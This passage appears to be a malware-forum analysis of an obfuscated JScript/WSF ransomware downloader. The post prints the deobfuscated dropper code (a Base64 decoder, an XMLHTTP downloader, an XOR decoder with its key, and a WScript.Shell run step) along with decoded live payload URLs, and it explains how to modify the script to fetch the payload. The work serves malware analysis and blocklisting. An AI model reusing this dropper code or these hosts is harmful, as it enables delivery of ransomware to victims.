klVVklVVklVY2NhW1RqXSBePSBiZXN0b2xvY2huYWhlclRSQXhLZXlbTWF0aC5mbG9vcihUaiAlIGJlc3RvbG9jaG5haGVyVFJBeEtleS5sZW5ndGgpXTsNCgl9CQkNCglyZXR1cm4gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVjY2E7DQp9Ow==".tttoooo();

// Downloader. Fetches gutter (one of the three URLs) with MSXML2.XMLHTTP, writes
// the response body to %TEMP%/<StrokaParam2> through ADODB.Stream, decodes that
// file (rtfta -> xdac -> satt) into %TEMP%/<StrokaParam2>.exe and runs it.
// Globals used: vulture (%TEMP%), sudabilo1 (XMLHTTP), LitoyDISK (ActiveXObject),
// ostrokoncert ("open"), chosen (1), RhXxGud ("type"), casque ("p"), tudabilo1 ("s"),
// amalgamation (".exe"), promises ("Run"), rampart (WScript.Shell), secupeku (WSH check).
// The listing stops at the closing brace of the if block; the function's own
// closing brace is not shown.
function _a2(gutter, StrokaParam2) {

// %TEMP%/<name>: where the still-obfuscated payload is saved.
var wandermander = vulture;
wandermander=wandermander+ "\u002f";
wandermander=wandermander + StrokaParam2 ;

// sudabilo1.open("GET", gutter, false): synchronous request
sudabilo1[ostrokoncert](("castilian","calibre","villa","personally","jewellery","percent","aging","pressure","G" + weasel) + ("negotiate","drover","firebrand","righthand","unalloyed","topmost","authorised","priceless","lesbians","bounce","T"), gutter, false);
// Base64 decodes to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)": a dated,
// fixed User-Agent, which is a useful proxy-log indicator for defenders.
sudabilo1.setRequestHeader("User-Agent", "TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=".tttoooo());
// sudabilo1.send()
sudabilo1[tudabilo1 + ("obtuse","devastation","overweening","herself","incarnation","end")]();


// The real work happens only when the WSH environment check passed.
if (secupeku) {

// "AETOTYESODB.Str12" -> replace("ETOTYES","D") -> replace("12","eam") = "ADODB.Stream"
var Nananananananana = new LitoyDISK((("copyrighted","prediction","hosiery","declaration","shakespeare","irrigation","AETOTYES")+("classical","milwaukee","emetic","portrayal","penitentiary","malevolent","zshops","propulsion","O")+"DB"+("divisible","jewelry","larynx","designer","capitalist","lambent","unveil",".S")+"tr12").replace("ETOTYES", "D").replace("12", "eam"));
Nananananananana[ostrokoncert](); // open()
Nananananananana[RhXxGud] = chosen; // type = 1 (adTypeBinary)
GaSMa = "BIL10NEBIL"; // junk implicit global
// write(sudabilo1.ResponseBody): "Re"+"s"+"p"+"ons"+"e"+"Body" ("Qm9keQ==")
Nananananananana["d3GIBDDSHNIKJpdGIBDDSHNIKGU=".tttoooo()](sudabilo1[("declension","suggestions","erratic","hallow","bedouin","malleable","Re")+"s"+("oppressor","giuseppe","crete","equitable","thompson","trill","p")+qtcnthltqfqrhfq['VLOPH']+"e"+"QGIBDDSHNIKmGIBDDSHNIK9GIBDDSHNIKkeQ=GIBDDSHNIK=".tttoooo()]);
XWaxeQhw = "BIL11NEBIL";
// "po22022ition".replace("22022", "s") = "position"; rewind to 0 before saving
Nananananananana[(casque + "o"+("notre","graphic","iceberg","frozen","environment","220")+("silky","smarter","graham","inanimate","channel","creation","barrel","22i")+"tion").replace("22"+("dormant","habitat","timed","babble","assignments","filed","shiny","022"), tudabilo1)] = 0;
krDwvrh = "BIL12NEBIL";
// saveToFile(path, 2): 2 = adSaveCreateOverWrite
Nananananananana["c2F2GIBDDSHNIKZVRvRmlsZQ=GIBDDSHNIK=GIBDDSHNIK".tttoooo()](wandermander, 2);
SswQdi = "BIL13NEBIL";
Nananananananana["Y2xvc2U=".tttoooo()](); // close()
// CP437 text -> byte values -> XOR with xKey -> written back as <path>.exe
var FrankSinatra=rtfta(wandermander);
FrankSinatra=xdac(FrankSinatra);
wandermander = wandermander + amalgamation;
satt(wandermander, FrankSinatra );
// WScript.Shell.Run(path, 1, true): normal window, wait for the process to exit
rampart[promises](wandermander, chosen, true);
}

The run part :
bestolochnaherVIUVIUVIUrampart[bestolochnaherVIUVIUVIUpromises](bestolochnaherVIUVIUVIUwandermander, bestolochnaherVIUVIUVIUchosen, true);

The run part with names simplified :
rampart[promises](wandermander, chosen, true);

The run part deobfuscated :
objShell.Run(path, 1, true)

Example for path :
c:\users\DardiM\AppData\Local\temp\qcoPPlYEo.exe
 

Der.Reisende

Level 45
Honorary Member
Top Poster
Content Creator
Malware Hunter
Dec 27, 2014
3,423
824643807708.wsf
From last pack sample on Malware Vault 23-8-16 #4
(Thanks to @Solarquest)

5/54 when I make this post
https://www.virustotal.com/en/file/...20a941e6946d1cae87b14739/analysis/1471961644/


This sample used the same obfuscation methods seen in a previous post:
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

1) Let's look at the Script - strange very long string :

The well-known functions (see the previous analysis of JS/NEMUCOD) are obfuscated in the Script with an 8146-character string:

var cipacipa = "CQkJCQkJZnVuY3Rpb24gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2QxWzB4M0I0XT0weEVCOyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
...
...
heSgpOw0KCQ0KdDJbMHg4MF09MHgwMEM3O3QyWzB4ODFdPTB4MDBGQztQzBdPTB4MjUxNDt0MlsweEMxXT0weDI1MzQ7dDJbMHhDMl09MHgyNTJDO3QyWzB4QzNdPTB4MjUxQzt0MlsweEM0XT0weDI1MDA7dDJbMHhDNV09MHgyNTNDO3QyWzB4QzZdPTB4MjU1RTt0MlsweEM3XT0weDI1NUY7dDJbMHhDOF09MHgyNTVBO3QyWzB4QzldPTB4MjU1NDt0MlsweENBXT0weDI1Njk7dDJbMHhDQl09MHgyNTY2O3QyWzB4Q0NdPTB4MjU2MDt0MlsweENEXT0weDI.
...
9Ow==
".tttoooo();"

You can look at the tttoooo() function
In the previous version, they had named it ".manysecretthings()" :confused:

I deleted the "trash" parts of the names that were put there to assault our eyes :p
bestolochnaherPAPAPAM
bestolochnaherVIUVIUVIU

etc...
2) Let's look at the Script - Decoder function :
// Custom Base64 decoder hung on String.prototype. Before decoding it strips every
// occurrence of the junk token "GIBDDSHNIK" (so the encoded strings in the script
// do not look like plain Base64), then decodes 4 chars -> 3 bytes through the
// VITKS lookup table (the Base64 alphabet table built elsewhere in the script;
// non-alphabet chars hold -1 and are skipped). Returns the decoded string; a '='
// padding char ends the decode early.
// NOTE(review): sud() is not defined anywhere in this listing; from its use here
// it looks like a string-length helper - confirm against the sample.
String.prototype.tttoooo = function() {
// XCOP is assigned without var: an implicit global used as the read cursor.
XCOP = 0;
var ddDccC1, ddDccC2, c3, c4;
var sudarinaB = this;
// Step 1: remove every occurrence of the junk token.
sudarinaB= sudarinaB.
replace(/GIBDDSHNIK/g, '');
var out = "";
var len = sud(sudarinaB);

while (XCOP < len) {

// First sextet: advance past chars that are not in the Base64 alphabet (-1).
do {
ddDccC1 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
} while (XCOP < len && ddDccC1 == -1);
if (ddDccC1 == -1)
break;

// Second sextet, same skipping of non-alphabet chars.
var dodo = false;
do {

ddDccC2 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
dodo = XCOP < len && ddDccC2 == -1;
} while (dodo);

if (ddDccC2 == -1)
break;

// Byte 1 = the 6 bits of sextet 1 + the top 2 bits of sextet 2.
out += String.
fromCharCode((ddDccC1 << 2) | ((ddDccC2 & 0x30) >> 4));

// Third sextet. 10*6+0.5*2 == 61 == '=' : padding, so the decode is finished.
do {

c3 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c3 == 10*6+0.5*2)
return out;

c3 = VITKS[c3];
} while (XCOP < len && c3 == -1);

if (c3 == -1)
break;


// Byte 2 = the low 4 bits of sextet 2 + the top 4 bits of sextet 3.
out += String.fromCharCode(((ddDccC2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));

// Fourth sextet; 61 is '=' again.
do {

c4 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c4 == 61)
return out;

c4 = VITKS[c4];
} while (XCOP < len && c4 == -1);

if (c4 == -1)

break;
// Byte 3 = the low 2 bits of sextet 3 + the 6 bits of sextet 4.
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}

return out;
};
- "Oh, a complicated function, it will be difficult to decode the strings"
- "No, remember the other analogous sample and analysis I linked above..."

This function not only does a Base64 decode but also deletes some chars used to obfuscate the string further.

.replace(/GIBDDSHNIK/g, '')
It also needs an array to make the Base64 Decode

// Base64 alphabet lookup table, stored with every entry offset by -101 so that the
// literal shows no obvious 0..63 values. After the +101 loop below: index 43 ('+')
// -> 62, index 47 ('/') -> 63, '0'..'9' -> 52..61, 'A'..'Z' -> 0..25, 'a'..'z' -> 26..51,
// and every -102 entry becomes -1 (= "not a Base64 char", which tttoooo() skips).
var VITKS = new Array(-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-39,-102,-102,-102,-38,-49,-48,-47,-46,-45,-44,-43,-42,-41,-40,-102,-102,-102,-102,-102,-102,-102,-101,-100,-99,-98,-97,-96,-95,-94,-93,-92,-91,-90,-89,-88,-87,-86,-85,-84,-83,-82,-81,-80,-79,-78,-77,-76,-102,-102,-102,-102,-102,-102,-75,-74,-73,-72,-71,-70,-69,-68,-67,-66,-65,-64,-63,-62,-61,-60,-59,-58,-57,-56,-55,-54,-53,-52,-51,-50,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102);

// Undo the -101 offset in place, once, at script load.
var VITKI, VITKSn = VITKS.
length;
for (VITKI= 0; VITKI < VITKSn; ++VITKI) {

VITKS[VITKI] = VITKS[VITKI] + 101;
}
3) Let's look at the Script - Long String decoded :

What does the VERY long string look like once decoded?
// Reads the downloaded file at filePath as text decoded with code page 437
// (Charset = 437) and hands the string to fsta(), which maps the CP437 chars
// back to the original byte values.
// The bracket-property names are split across two lines in this listing (forum
// line-wrap); in the sample they are "type", "Charset", "open", "LoadFromFile",
// "ReadText" and "close".
function rtfta(filePath) {
var rosteks = WScript["CreateObject"]("ADODB.Stream");
// 2 = adTypeText
rosteks["
type"] = 2;
rosteks["
Charset"] = 437;
rosteks["
open"]();
rosteks["
LoadFromFile"](filePath);
// ReadText is used without parentheses; JScript's COM binding presumably still
// invokes it and returns the whole text - not verified here.
var fileString = rosteks["
ReadText"];
rosteks["
close"]();
return fsta(fileString);
};

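// Maps a string that was read as code page 437 back to the raw byte values it
// came from. Chars < 128 are kept as they are; chars >= 128 are looked up in the
// inverse CP437 table (Unicode code point -> byte 0x80..0xFF). Code points that
// are not in the table yield undefined, exactly like the original sparse lookup.
// Listing fix: the original had the property name "charCodeAt" split over two
// lines (forum line-wrap), which is not valid JS; it is a single token here.
// Returns an array of numbers, one entry per input char.
function fsta(fileString) {
// CP437 upper half: index = byte - 0x80, value = Unicode code point.
var cp437 = [
0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, 0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5,
0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, 0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192,
0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, 0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB,
0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, 0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229,
0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, 0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0
];
// Inverse table: code point -> byte (sparse array, same shape as the original t1).
var t1 = new Array();
for (var k = 0; k < cp437.length; k++) {
t1[cp437[k]] = 0x80 + k;
}

var resultArray = new Array();
for (var Tj = 0; Tj < fileString["length"]; Tj++) {
var OVc9 = fileString["charCodeAt"](Tj);
// ASCII passes through; everything else goes through the inverse table.
resultArray["push"](OVc9 < 128 ? OVc9 : t1[OVc9]);
};

return resultArray;
};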

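function fats(codeArray) {
    // Inverse of fsta(): converts an array of byte values (the output of the XOR
    // step, xdac) into a string that satt() then writes out with ADODB.Stream in
    // text mode, Charset 437. Each byte becomes the Unicode character that the
    // same byte denotes in code page 437, so the "text" round-trips back to the
    // original binary when it is written with that charset.
    //   - values < 128 are returned as-is (ASCII is identical in code page 437);
    //   - values 0x80..0xFF are looked up in the table below;
    //   - anything else (> 0xFF, non-integer) has no entry: the sample then calls
    //     String.fromCharCode(undefined), which yields "\u0000", and that
    //     behaviour is kept so this decoder matches the sample byte for byte.
    // The listing as pasted into the thread had line breaks inside its string
    // literals ("length", "fromCharCode", "join") and a stray token after the
    // else block; those are repaired here, nothing else changes.
    //
    // Unicode code points for bytes 0x80..0xFF of code page 437, in byte order,
    // sixteen per row (first row = 0x80..0x8F, second = 0x90..0x9F, and so on).
    var CP437_HIGH = [
        0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, 0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5,
        0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, 0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192,
        0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, 0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB,
        0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
        0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
        0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
        0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, 0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229,
        0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, 0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0
    ];

    // Sparse lookup keyed by the byte value itself, exactly like the sample's t2,
    // so that out-of-range or oddly typed inputs resolve the same way (undefined).
    var t2 = [];
    for (var b = 0; b < CP437_HIGH.length; b++) {
        t2[0x80 + b] = CP437_HIGH[b];
    }

    var chars = [];
    for (var i = 0; i < codeArray.length; i++) {
        var byteVal = codeArray[i];
        var codePoint = (byteVal < 128) ? byteVal : t2[byteVal];
        chars.push(String.fromCharCode(codePoint));
    }
    return chars.join("");
}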

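function satt(filePath, codeArray) {
    // Last stage of the dropper: persists the decoded payload to disk.
    // fats() turns the byte array into its code-page-437 text form, and the
    // ADODB.Stream is opened in text mode with Charset 437 so that writing that
    // text re-encodes every character to the single byte it came from -- the
    // file on disk is therefore the raw binary (the ransomware .exe, per the
    // analysis), even though it went through a "text" stream.
    // The numeric constants are the documented ADO values: Type 2 = adTypeText,
    // SaveToFile option 2 = adSaveCreateOverWrite (an existing file at filePath
    // is replaced without warning). Nothing here validates filePath; per the
    // analysis the caller passes the drop name recovered from the URL loop.
    // Property names keep the sample's spelling (type/open/writeText); COM
    // dispatch is case-insensitive, which is presumably why these resolve.
    // The pasted listing had line breaks inside these property-name strings;
    // they are repaired here, nothing else changes.
    var stream = WScript.CreateObject("ADODB.Stream");
    stream.type = 2;
    stream.Charset = 437;
    stream.open();
    stream.writeText(fats(codeArray));
    stream.SaveToFile(filePath, 2);
    stream.close();
}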

function xdac(cca) {
    // XOR layer of the payload decoding. Every element of cca is XOR-ed in place
    // with the key byte at the same position modulo the key length; xKey is a
    // script-level array (built with fsta() in the main part of the script).
    // Returns the same array object, so callers can chain on the result.
    var keyLen = xKey.length;
    var i = 0;
    while (i < cca.length) {
        cca[i] = cca[i] ^ xKey[i % keyLen];
        i++;
    }
    return cca;
}
We can see the well-known functions (see the previous JS/NEMUCOD analysis) that turn the obfuscated payload — which is not recognisable as an executable when downloaded, because its content has been transformed — back into the real ransomware .exe:

rtfta => loads the downloaded payload content and calls fsta(fileString)
xdac => XOR deobfuscation, done in place on the byte array using the xKey array (the key is applied cyclically: byte i is XOR-ed with xKey[i % xKey.length])
fsta => first "substitution" decoder: maps each character of the text (read as code page 437, cf. Charset = 437 in satt) back to its original byte value; characters below 128 pass through unchanged, so for a pure-ASCII string it is the identity. Also used to obtain xKey.
fats => second "substitution" decoder, the inverse of fsta: turns the XOR-decoded byte array back into a code-page-437 string so that ADODB.Stream can write it out
satt => calls fats and writes the result to disk with ADODB.Stream (text mode, Charset 437, overwrite), producing the real ".exe"

and xKey => the key used for the main XOR decoding step

This last var is now in the main Script part :

// Key for the XOR layer (used by xdac). The argument is 32 printable ASCII
// characters, and the fileString loop above passes every code point below 128
// through unchanged, so xKey is simply the 32 ASCII byte values of this literal
// -- wrapping it in fsta() adds no real protection.
var xKey = fsta("pxhMZi6AIY0OtsmRMnKeSwpSwoJtpSdT")

See this post : spoiler with details :

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229

4) Are the URLs well obfuscated?

From the previous analysis of the analogous method:

// Download attempts from the earlier sample, shown for comparison: three calls to
// the downloader Shtyler4(url, dropName), each in its own try/catch with an empty
// handler, so a failing host is silently skipped and the next one is tried. Note
// that each call uses a different drop name (JlLQdKnWwif, bsMnCcz, FgGsqpxH).
// The host and path are split across concatenated literals and spelled with
// \uXXXX escapes (e.g. "\u0068e\u0072i\u006Da\u0073u" is just "herimasu"), which
// only hides the URL from a plain-text grep; the decoded URLs are listed below.
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}


=> URL obfuscation method: \uXXXX Unicode escapes inside the string literals (plus splitting each URL across several concatenated strings); unescaping them gives:
- Using the tool I linked in part (1) :

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

This time they have "encoded" the URLs, and we need to read their decode function to know which characters have to be deleted before the Base64 decoding:

every occurrence of "GIBDDSHNIK" has to be deleted (it is a junk marker spliced into the Base64 text to defeat naive decoding; the decode helper strips it with .replace(/GIBDDSHNIK/g, '') before decoding)

But we can recognize the same structure, this time implemented with a loop :)

- Shtyler4 => _a2
- 3 strings in an array => 3 URLs from which to retrieve the payload (each attempt sits in its own try/catch with an empty handler, so if one host fails the next one is simply tried)

This time there is a single file name for the payload, instead of the same payload being downloaded three times under 3 different names... :D

// Same structure as in the earlier sample, now data-driven: the three host/path
// strings live in one array, each entry being Base64 with the junk marker
// "GIBDDSHNIK" spliced in. Per the analysis, the custom String.prototype method
// tttoooo() removes the marker (.replace(/GIBDDSHNIK/g, '')) and Base64-decodes.
var _a5 = ["bWFqLmNsYWFzLmZyL0hKZ2hqYjGIBDDSHNIKU0","a291dG9rdWthbi53ZWIuZmMyGIBDDSHNIKLmNvbS9ISmdoamI1NA==","emlrdW5vYW5hLmhvdWtvdS1vbmNoaGIBDDSHNIKS5jb20vSEpnaGpiNTQ="];

// for...in over an array: visits the index keys "0", "1", "2" (and any enumerable
// property someone added to Array.prototype). uueee is assigned without var, so it
// becomes an implicit global. Every URL gets the same query string appended and
// the same drop name "qcoPPlYEo" as second argument; the empty catch means a
// failed host just falls through to the next one.
for(uueee in _a5){

try{
_a2("http://"+_a5[uueee].tttoooo() + "?nTStkY=KsBazYnqnR","qcoPPlYEo");
}catch(_a3){}
}

First Step :
'bWFqLmNsYWFzLmZyL0hKZ2hqYjGIBDDSHNIKU0'
"a291dG9rdWthbi53ZWIuZmMyGIBDDSHNIKLmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoaGIBDDSHNIKS5jb20vSEpnaGpiNTQ="

'bWFqLmNsYWFzLmZyL0hKZ2hqYjU0"
"a291dG9rdWthbi53ZWIuZmMyLmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoaS5jb20vSEpnaGpiNTQ="

Second step :

=> using the Base64 Decode tool from notepad++ :

maj.claas.fr/HJghjb54
koutokukan.web.fc2.com/HJghjb54
zikunoana.houkou-onchi.com/HJghjb54
Third Step : concatenation

URLS :

maj.claas.fr/HJghjb54?nTStkY=KsBazYnqnR
koutokukan.web.fc2.com/HJghjb54?nTStkY=KsBazYnqnR
zikunoana.houkou-onchi.com/HJghjb54?nTStkY=KsBazYnqnR (the loop appends the same query string to every entry)

Payload => file name: qcoPPlYEo (the second argument of _a2), i.e. qcoPPlYEo.exe once the script has correctly deobfuscated it

5) Conclusion :

A big difference with the previous analogue sample :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

In the first one, they had put a lot of useless parts/functions to obfuscate the script further, but the URLs and payload name were very easy to retrieve, without needing to understand their decode function and the encoded parts.

In this sample, we only need to know that the "GIBDDSHNIK" part has to be deleted (all occurrences)

But in this family of obfuscation :

We just have to find the .replace(/GIBDDSHNIK/g, '') call in the decode helper (the marker will presumably differ from sample to sample, so look for the replace call rather than for this literal),
remove every occurrence of the marker from the strings we want to decode,
copy-paste them into Notepad++ (or another tool) => Base64 decode,

and we immediately get the URLs to blacklist.

To retrieve the deobfuscated payload, only a small part of the script has to be modified:
- the payload is then downloaded and decoded, but not run. (Do this only in an isolated analysis VM with no access to production networks: the modified script still contacts the live hosts and drops a real executable.)

See my previous analysis of the analogous sample :)




Wow, that was a fast one! Thank you for sharing, amazing work as always, @DardiM :)
 

